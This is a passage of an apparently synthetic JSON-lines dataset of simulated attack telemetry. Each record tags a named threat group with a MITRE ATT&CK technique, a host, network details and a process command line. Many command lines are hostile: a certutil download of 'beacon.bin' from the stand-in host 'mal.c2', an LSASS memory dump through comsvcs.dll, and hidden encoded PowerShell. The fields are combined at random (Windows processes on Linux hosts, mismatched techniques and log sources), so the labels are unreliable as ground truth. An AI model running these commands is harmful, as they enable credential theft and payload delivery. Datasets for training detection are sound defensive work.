full","name":"powershell.exe","parent_name":"svchost.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2026-09-08T18:59:54.000Z","user":{"name":"CORP\\khslux4f4d33","sid":"S-1-5-21-787362252-847811517-9082"}} |
{"attack":{"actor":"Mustang Panda","confidence":1.0,"description":"[Mustang Panda] performed T1531 using encrypted C2 technique.","sub_technique":"Cloud Service Hijack / Account Access Removal","tactic":["Collection","Lateral Movement","Persistence"],"technique_id":"T1531"},"event_id":"evt_mustangpanda_20250213T123247000Z_0006049","ground_truth":{"detection_guidance":"Sigma rule for T1531 | Join on src_ip within 10m","evasion_used":["LOLBin","TLS","Base64"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.140.161.94","name":"DB-ORACLE-ZDM4EJVN7Z","os":"Amazon Linux 2"},"impact":{"business_risk":"Domain dominance","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"6049Mustang PandaT1531"},"network":{"domain":"cdn-content.com","dst_ip":"1.50.170.225","dst_port":8443,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc JABkACAALQBlAH...","name":"mshta.exe","parent_name":"winlogon.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2025-08-05T11:53:13.000Z","user":{"name":"arn:aws:iam::vfe6z58aaz9p","sid":"S-1-5-21-511524900-156986602-4579"}} |
{"attack":{"actor":"Volt Typhoon","confidence":1.0,"description":"[Volt Typhoon] performed T1570 using LOLBin technique.","sub_technique":"Lateral Tool Transfer","tactic":["Lateral Movement","Persistence","Discovery"],"technique_id":"T1570"},"event_id":"evt_volttyphoon_20260515T015815000Z_0006051","ground_truth":{"detection_guidance":"Sigma rule for T1570 | Join on src_ip within 10m","evasion_used":["TLS","WMI","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.59.169.73","name":"WIN-FIN-SRV-TG17DLX54P","os":"Ubuntu 22.04"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"6051Volt TyphoonT1570"},"network":{"domain":"update.microsoft.com","dst_ip":"1.119.32.117","dst_port":445,"protocol":"HTTP/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...","name":"cmstp.exe","parent_name":"svchost.exe"},"source":"CloudTrail (DS0028)","timestamp":"2026-06-09T20:06:22.000Z","user":{"name":"CORP\\qoni3ms1en16","sid":"S-1-5-21-122121256-828335857-3768"}} |
{"attack":{"actor":"APT29","confidence":1.0,"description":"[APT29] performed T1071.001 using encrypted C2 technique.","sub_technique":"Web Protocols (HTTPS C2)","tactic":["Collection","Execution","Defense Evasion"],"technique_id":"T1071.001"},"event_id":"evt_apt29_20260602T053926000Z_0006053","ground_truth":{"detection_guidance":"Sigma rule for T1071.001 | Join on src_ip within 10m","evasion_used":["WMI","LOLBin","Base64"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.4.189.213","name":"IAM-ROLE-XO1131ZGN2","os":"Ubuntu 22.04"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"6053APT29T1071.001"},"network":{"domain":"github.com","dst_ip":"1.26.18.101","dst_port":5985,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 1717 C:\\temp\\lsass.dmp full","name":"cmstp.exe","parent_name":"svchost.exe"},"source":"Windows Security Log","timestamp":"2025-01-05T23:25:20.000Z","user":{"name":"i-7s9vzcez9ya3","sid":"S-1-5-21-796914068-922330661-1339"}} |
{"attack":{"actor":"Mustang Panda","confidence":1.0,"description":"[Mustang Panda] performed T1071.001 using LOLBin technique.","sub_technique":"Web Protocols (HTTPS C2)","tactic":["Execution","Persistence"],"technique_id":"T1071.001"},"event_id":"evt_mustangpanda_20261218T120652000Z_0006055","ground_truth":{"detection_guidance":"Sigma rule for T1071.001 | Join on src_ip within 10m","evasion_used":["LOLBin","TLS","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.74.55.40","name":"EC2-INST-XN0TNL1Z3T","os":"Amazon Linux 2"},"impact":{"business_risk":"Domain dominance","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"6055Mustang PandaT1071.001"},"network":{"domain":"update.microsoft.com","dst_ip":"1.19.255.118","dst_port":5985,"protocol":"HTTP/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"powershell.exe","parent_name":"services.exe"},"source":"Windows Security Log","timestamp":"2025-01-16T14:01:08.000Z","user":{"name":"i-oo619kkdxm6m","sid":"S-1-5-21-957494612-277306978-9721"}} |
{"attack":{"actor":"APT41","confidence":1.0,"description":"[APT41] performed T1566.001 using cloud-native technique.","sub_technique":"Phishing: Spearphishing Attachment","tactic":["Exfiltration","Initial Access"],"technique_id":"T1566.001"},"event_id":"evt_apt41_20260522T101211000Z_0006057","ground_truth":{"detection_guidance":"Sigma rule for T1566.001 | Join on src_ip within 10m","evasion_used":["LOLBin","WMI","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.90.42.7","name":"EC2-INST-45TWPSLDJR","os":"Windows Server 2022"},"impact":{"business_risk":"Domain dominance","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"6057APT41T1566.001"},"network":{"domain":"github.com","dst_ip":"1.182.195.143","dst_port":3389,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"cmstp.exe","parent_name":"winlogon.exe"},"source":"Network Connection (DS0029)","timestamp":"2026-02-14T05:57:16.000Z","user":{"name":"arn:aws:iam::190qiy4txuly","sid":"S-1-5-21-991645872-549406333-4012"}} |
{"attack":{"actor":"APT29","confidence":1.0,"description":"[APT29] performed T1546.003 using cloud-native technique.","sub_technique":"Event Triggered Execution: WMI Event Subscription","tactic":["Reconnaissance","Collection"],"technique_id":"T1546.003"},"event_id":"evt_apt29_20251230T122737000Z_0006059","ground_truth":{"detection_guidance":"Sigma rule for T1546.003 | Join on src_ip within 10m","evasion_used":["TLS","Fileless","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.120.150.81","name":"APP-WEB-VHV63AWK5Q","os":"Ubuntu 22.04"},"impact":{"business_risk":"Long-term persistence achieved","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"6059APT29T1546.003"},"network":{"domain":"update.microsoft.com","dst_ip":"1.13.233.31","dst_port":445,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"mshta.exe","parent_name":"explorer.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2025-06-24T16:03:39.000Z","user":{"name":"arn:aws:iam::iamxnhsdq02o","sid":"S-1-5-21-633779039-282745645-3844"}} |
{"attack":{"actor":"Volt Typhoon","confidence":1.0,"description":"[Volt Typhoon] performed T1531 using encrypted C2 technique.","sub_technique":"Cloud Service Hijack / Account Access Removal","tactic":["Reconnaissance","Lateral Movement"],"technique_id":"T1531"},"event_id":"evt_volttyphoon_20251208T124127000Z_0006061","ground_truth":{"detection_guidance":"Sigma rule for T1531 | Join on src_ip within 10m","evasion_used":["Base64","TLS","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.7.177.192","name":"APP-WEB-QSDJCHH1VF","os":"Ubuntu 22.04"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"6061Volt TyphoonT1531"},"network":{"domain":"update.microsoft.com","dst_ip":"1.133.108.213","dst_port":8443,"protocol":"HTTP/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 3886 C:\\temp\\lsass.dmp full","name":"mshta.exe","parent_name":"svchost.exe"},"source":"Network Connection (DS0029)","timestamp":"2025-06-21T23:29:14.000Z","user":{"name":"azuread\\v922jiqagez4","sid":"S-1-5-21-292522567-355297170-3981"}} |
{"attack":{"actor":"Lapsus$","confidence":1.0,"description":"[Lapsus$] performed T1098.004 using encrypted C2 technique.","sub_technique":"SSH Authorized Keys","tactic":["Privilege Escalation"],"technique_id":"T1098.004"},"event_id":"evt_lapsus_20260924T190236000Z_0006063","ground_truth":{"detection_guidance":"Sigma rule for T1098.004 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","LOLBin","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.191.63.245","name":"APP-WEB-WRHG1MWHB8","os":"Windows 11"},"impact":{"business_risk":"Cloud environment takeover","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"6063Lapsus$T1098.004"},"network":{"domain":"github.com","dst_ip":"1.114.221.27","dst_port":445,"protocol":"HTTP/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"bitsadmin.exe","parent_name":"explorer.exe"},"source":"Network Connection (DS0029)","timestamp":"2025-10-13T08:13:02.000Z","user":{"name":"CORP\\5h5jp5robqrv","sid":"S-1-5-21-493555099-685451211-3543"}} |
{"attack":{"actor":"Lapsus$","confidence":1.0,"description":"[Lapsus$] performed T1484.001 using cloud-native technique.","sub_technique":"Domain Policy Modification: Group Policy Modification","tactic":["Execution"],"technique_id":"T1484.001"},"event_id":"evt_lapsus_20260829T181710000Z_0006065","ground_truth":{"detection_guidance":"Sigma rule for T1484.001 | Join on src_ip within 10m","evasion_used":["Fileless","JA3 Spoof","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.32.15.81","name":"EC2-INST-6NCCS5MGQG","os":"Ubuntu 22.04"},"impact":{"business_risk":"Domain dominance","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"6065Lapsus$T1484.001"},"network":{"domain":"cdn-content.com","dst_ip":"1.14.114.74","dst_port":443,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 3020 C:\\temp\\lsass.dmp full","name":"bitsadmin.exe","parent_name":"svchost.exe"},"source":"Sysmon (DS0024)","timestamp":"2026-10-11T14:00:06.000Z","user":{"name":"CORP\\nbuv5lw24b1x","sid":"S-1-5-21-271882337-130514075-7406"}} |
{"attack":{"actor":"UNC4841","confidence":1.0,"description":"[UNC4841] performed T1059.001 using cloud-native technique.","sub_technique":"PowerShell","tactic":["Exfiltration"],"technique_id":"T1059.001"},"event_id":"evt_unc4841_20251224T103026000Z_0006067","ground_truth":{"detection_guidance":"Sigma rule for T1059.001 | Join on src_ip within 10m","evasion_used":["Fileless","Base64","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.255.124.53","name":"EC2-INST-52YVKJ5DDU","os":"Windows 11"},"impact":{"business_risk":"Cloud environment takeover","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"6067UNC4841T1059.001"},"network":{"domain":"github.com","dst_ip":"1.5.40.115","dst_port":5985,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc JABkACAALQBlAH...","name":"cmstp.exe","parent_name":"winlogon.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2026-02-07T13:14:53.000Z","user":{"name":"arn:aws:iam::firwvrzpjt9l","sid":"S-1-5-21-853732721-751007300-7508"}} |
{"attack":{"actor":"APT29","confidence":1.0,"description":"[APT29] performed T1021.006 using LOLBin technique.","sub_technique":"Windows Remote Management","tactic":["Credential Access"],"technique_id":"T1021.006"},"event_id":"evt_apt29_20250206T191132000Z_0006069","ground_truth":{"detection_guidance":"Sigma rule for T1021.006 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","Fileless","Base64"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.197.34.27","name":"WIN-FIN-SRV-9RQYEO5EA3","os":"Windows Server 2022"},"impact":{"business_risk":"Data exfiltration channel open","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"6069APT29T1021.006"},"network":{"domain":"github.com","dst_ip":"1.51.81.189","dst_port":5985,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...","name":"bitsadmin.exe","parent_name":"services.exe"},"source":"Sysmon (DS0024)","timestamp":"2026-03-31T23:15:23.000Z","user":{"name":"azuread\\bzx8h3un5lv6","sid":"S-1-5-21-463687424-861951064-5743"}} |
{"attack":{"actor":"APT29","confidence":1.0,"description":"[APT29] performed T1059.001 using fileless technique.","sub_technique":"PowerShell","tactic":["Exfiltration"],"technique_id":"T1059.001"},"event_id":"evt_apt29_20261215T111709000Z_0006071","ground_truth":{"detection_guidance":"Sigma rule for T1059.001 | Join on src_ip within 10m","evasion_used":["Base64","JA3 Spoof","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.179.245.82","name":"APP-WEB-AEYSAD62EZ","os":"Windows Server 2022"},"impact":{"business_risk":"Domain dominance","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"6071APT29T1059.001"},"network":{"domain":"update.microsoft.com","dst_ip":"1.120.253.146","dst_port":5985,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 3732 C:\\temp\\lsass.dmp full","name":"bitsadmin.exe","parent_name":"svchost.exe"},"source":"Network Connection (DS0029)","timestamp":"2025-12-08T08:55:45.000Z","user":{"name":"svc_mjk7eudwg1x4","sid":"S-1-5-21-730104828-420051865-3891"}} |
{"attack":{"actor":"Lapsus$","confidence":1.0,"description":"[Lapsus$] performed T1570 using encrypted C2 technique.","sub_technique":"Lateral Tool Transfer","tactic":["Impact"],"technique_id":"T1570"},"event_id":"evt_lapsus_20260716T094429000Z_0006073","ground_truth":{"detection_guidance":"Sigma rule for T1570 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","TLS","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.137.175.123","name":"APP-WEB-E52GRCN5DD","os":"Amazon Linux 2"},"impact":{"business_risk":"Data exfiltration channel open","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"6073Lapsus$T1570"},"network":{"domain":"aws.amazon.com","dst_ip":"1.43.4.233","dst_port":445,"protocol":"HTTP/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...","name":"bitsadmin.exe","parent_name":"services.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2025-10-10T01:02:18.000Z","user":{"name":"i-1upgzvo4hx5h","sid":"S-1-5-21-894600066-804828068-3147"}} |
{"attack":{"actor":"Lapsus$","confidence":1.0,"description":"[Lapsus$] performed T1566.001 using encrypted C2 technique.","sub_technique":"Phishing: Spearphishing Attachment","tactic":["Reconnaissance","Execution"],"technique_id":"T1566.001"},"event_id":"evt_lapsus_20261218T075826000Z_0006075","ground_truth":{"detection_guidance":"Sigma rule for T1566.001 | Join on src_ip within 10m","evasion_used":["WMI","Fileless","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.189.201.121","name":"WIN-FIN-SRV-UOXJ7VF9GC","os":"Ubuntu 22.04"},"impact":{"business_risk":"Long-term persistence achieved","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"6075Lapsus$T1566.001"},"network":{"domain":"update.microsoft.com","dst_ip":"1.94.249.13","dst_port":443,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"cmstp.exe","parent_name":"svchost.exe"},"source":"Network Connection (DS0029)","timestamp":"2026-03-27T12:34:04.000Z","user":{"name":"azuread\\pcecugx7ddfh","sid":"S-1-5-21-170042031-202289912-7327"}} |
{"attack":{"actor":"Volt Typhoon","confidence":1.0,"description":"[Volt Typhoon] performed T1021.006 using encrypted C2 technique.","sub_technique":"Windows Remote Management","tactic":["Execution","Persistence"],"technique_id":"T1021.006"},"event_id":"evt_volttyphoon_20251227T001722000Z_0006077","ground_truth":{"detection_guidance":"Sigma rule for T1021.006 | Join on src_ip within 10m","evasion_used":["LOLBin","TLS","Base64"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.190.68.178","name":"DB-ORACLE-6O9RNSI0GH","os":"Ubuntu 22.04"},"impact":{"business_risk":"Cloud environment takeover","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"6077Volt TyphoonT1021.006"},"network":{"domain":"update.microsoft.com","dst_ip":"1.168.26.222","dst_port":8443,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"mshta.exe","parent_name":"svchost.exe"},"source":"Network Connection (DS0029)","timestamp":"2025-08-08T18:34:01.000Z","user":{"name":"azuread\\rhstz384y4f7","sid":"S-1-5-21-224330356-248601456-6984"}} |
{"attack":{"actor":"APT29","confidence":1.0,"description":"[APT29] performed T1021.006 using LOLBin technique.","sub_technique":"Windows Remote Management","tactic":["Execution"],"technique_id":"T1021.006"},"event_id":"evt_apt29_20251010T041151000Z_0006079","ground_truth":{"detection_guidance":"Sigma rule for T1021.006 | Join on src_ip within 10m","evasion_used":["Base64","Fileless","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.30.1.37","name":"EC2-INST-XXY915N12R","os":"Amazon Linux 2"},"impact":{"business_risk":"Domain dominance","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"6079APT29T1021.006"},"network":{"domain":"cdn-content.com","dst_ip":"1.9.254.197","dst_port":443,"protocol":"HTTP/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...","name":"bitsadmin.exe","parent_name":"explorer.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2026-10-07T15:27:53.000Z","user":{"name":"svc_rz3azbpjgpo8","sid":"S-1-5-21-368529052-679450113-7452"}} |
{"attack":{"actor":"Volt Typhoon","confidence":1.0,"description":"[Volt Typhoon] performed T1071.001 using cloud-native technique.","sub_technique":"Web Protocols (HTTPS C2)","tactic":["Privilege Escalation"],"technique_id":"T1071.001"},"event_id":"evt_volttyphoon_20251116T224739000Z_0006081","ground_truth":{"detection_guidance":"Sigma rule for T1071.001 | Join on src_ip within 10m","evasion_used":["Fileless","JA3 Spoof","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.29.40.11","name":"DB-ORACLE-RCHT4RCI2C","os":"Windows 11"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"6081Volt TyphoonT1071.001"},"network":{"domain":"cdn-content.com","dst_ip":"1.91.116.223","dst_port":443,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"mshta.exe","parent_name":"winlogon.exe"},"source":"CloudTrail (DS0028)","timestamp":"2025-10-24T15:37:55.000Z","user":{"name":"i-otupotlz60ly","sid":"S-1-5-21-689655432-544702729-1590"}} |
{"attack":{"actor":"FIN7","confidence":1.0,"description":"[FIN7] performed T1484.001 using encrypted C2 technique.","sub_technique":"Domain Policy Modification: Group Policy Modification","tactic":["Persistence","Discovery","Defense Evasion"],"technique_id":"T1484.001"},"event_id":"evt_fin7_20250222T133038000Z_0006083","ground_truth":{"detection_guidance":"Sigma rule for T1484.001 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","Fileless","Base64"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.87.90.248","name":"APP-WEB-7EN3SW3640","os":"Windows 11"},"impact":{"business_risk":"Cloud environment takeover","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"6083FIN7T1484.001"},"network":{"domain":"github.com","dst_ip":"1.74.158.102","dst_port":443,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc JABkACAALQBlAH...","name":"rundll32.exe","parent_name":"services.exe"},"source":"Sysmon (DS0024)","timestamp":"2025-01-08T11:26:03.000Z","user":{"name":"azuread\\vjcszwoc45iu","sid":"S-1-5-21-502803096-691509669-6481"}} |
{"attack":{"actor":"Mustang Panda","confidence":1.0,"description":"[Mustang Panda] performed T1003.001 using LOLBin technique.","sub_technique":"OS Credential Dumping: LSASS Memory","tactic":["Persistence"],"technique_id":"T1003.001"},"event_id":"evt_mustangpanda_20260817T095141000Z_0006085","ground_truth":{"detection_guidance":"Sigma rule for T1003.001 | Join on src_ip within 10m","evasion_used":["WMI","Base64","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.110.191.164","name":"EC2-INST-02XPCVTB5F","os":"Windows 11"},"impact":{"business_risk":"Domain dominance","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"6085Mustang PandaT1003.001"},"network":{"domain":"aws.amazon.com","dst_ip":"1.61.179.68","dst_port":443,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...","name":"certutil.exe","parent_name":"winlogon.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2026-08-08T22:35:47.000Z","user":{"name":"svc_09csmm4adhba","sid":"S-1-5-21-403831554-526796350-2130"}} |
{"attack":{"actor":"APT41","confidence":1.0,"description":"[APT41] performed T1071.001 using LOLBin technique.","sub_technique":"Web Protocols (HTTPS C2)","tactic":["Collection","Defense Evasion"],"technique_id":"T1071.001"},"event_id":"evt_apt41_20260513T232117000Z_0006087","ground_truth":{"detection_guidance":"Sigma rule for T1071.001 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","LOLBin","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.116.2.210","name":"AZURE-VM-2C296MQPCX","os":"Ubuntu 22.04"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"6087APT41T1071.001"},"network":{"domain":"aws.amazon.com","dst_ip":"1.105.63.40","dst_port":5985,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 1767 C:\\temp\\lsass.dmp full","name":"rundll32.exe","parent_name":"winlogon.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2025-07-01T20:20:41.000Z","user":{"name":"i-us16xyyzr9ub","sid":"S-1-5-21-906850558-474376308-1436"}} |
{"attack":{"actor":"Lapsus$","confidence":1.0,"description":"[Lapsus$] performed T1071.001 using encrypted C2 technique.","sub_technique":"Web Protocols (HTTPS C2)","tactic":["Execution","Defense Evasion"],"technique_id":"T1071.001"},"event_id":"evt_lapsus_20260726T100550000Z_0006089","ground_truth":{"detection_guidance":"Sigma rule for T1071.001 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","LOLBin","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.201.60.72","name":"EC2-INST-YZ6NFKFFRU","os":"Windows Server 2022"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"6089Lapsus$T1071.001"},"network":{"domain":"github.com","dst_ip":"1.0.64.92","dst_port":3389,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc JABkACAALQBlAH...","name":"rundll32.exe","parent_name":"winlogon.exe"},"source":"Windows Security Log","timestamp":"2025-02-19T22:05:51.000Z","user":{"name":"svc_nqmhc5db4qku","sid":"S-1-5-21-310618409-286016542-5014"}} |
{"attack":{"actor":"FIN7","confidence":1.0,"description":"[FIN7] performed T1021.006 using fileless technique.","sub_technique":"Windows Remote Management","tactic":["Execution","Impact"],"technique_id":"T1021.006"},"event_id":"evt_fin7_20250221T173016000Z_0006091","ground_truth":{"detection_guidance":"Sigma rule for T1021.006 | Join on src_ip within 10m","evasion_used":["LOLBin","JA3 Spoof","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.135.173.154","name":"EC2-INST-CSU3SHXNUX","os":"Ubuntu 22.04"},"impact":{"business_risk":"Domain dominance","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"6091FIN7T1021.006"},"network":{"domain":"aws.amazon.com","dst_ip":"1.4.25.249","dst_port":3389,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"bitsadmin.exe","parent_name":"services.exe"},"source":"Network Connection (DS0029)","timestamp":"2026-01-16T13:04:44.000Z","user":{"name":"CORP\\fnzlisvu4b97","sid":"S-1-5-21-552014677-988430295-6326"}} |
{"attack":{"actor":"Scattered Spider","confidence":1.0,"description":"[Scattered Spider] performed T1484.001 using cloud-native technique.","sub_technique":"Domain Policy Modification: Group Policy Modification","tactic":["Initial Access"],"technique_id":"T1484.001"},"event_id":"evt_scatteredspider_20261127T035700000Z_0006093","ground_truth":{"detection_guidance":"Sigma rule for T1484.001 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","LOLBin","Base64"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.28.210.114","name":"DB-ORACLE-JWIINUJZIF","os":"Ubuntu 22.04"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"6093Scattered SpiderT1484.001"},"network":{"domain":"aws.amazon.com","dst_ip":"1.71.249.89","dst_port":3389,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc JABkACAALQBlAH...","name":"rundll32.exe","parent_name":"svchost.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2026-02-28T23:52:13.000Z","user":{"name":"CORP\\iq92qtdta345","sid":"S-1-5-21-118189898-887115936-6598"}} |
{"attack":{"actor":"Scattered Spider","confidence":1.0,"description":"[Scattered Spider] performed T1484.001 using cloud-native technique.","sub_technique":"Domain Policy Modification: Group Policy Modification","tactic":["Lateral Movement","Command and Control","Defense Evasion"],"technique_id":"T1484.001"},"event_id":"evt_scatteredspider_20261214T082335000Z_0006095","ground_truth":{"detection_guidance":"Sigma rule for T1484.001 | Join on src_ip within 10m","evasion_used":["Fileless","TLS","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.6.235.69","name":"APP-WEB-S8H2TDZ1NR","os":"Windows Server 2022"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"6095Scattered 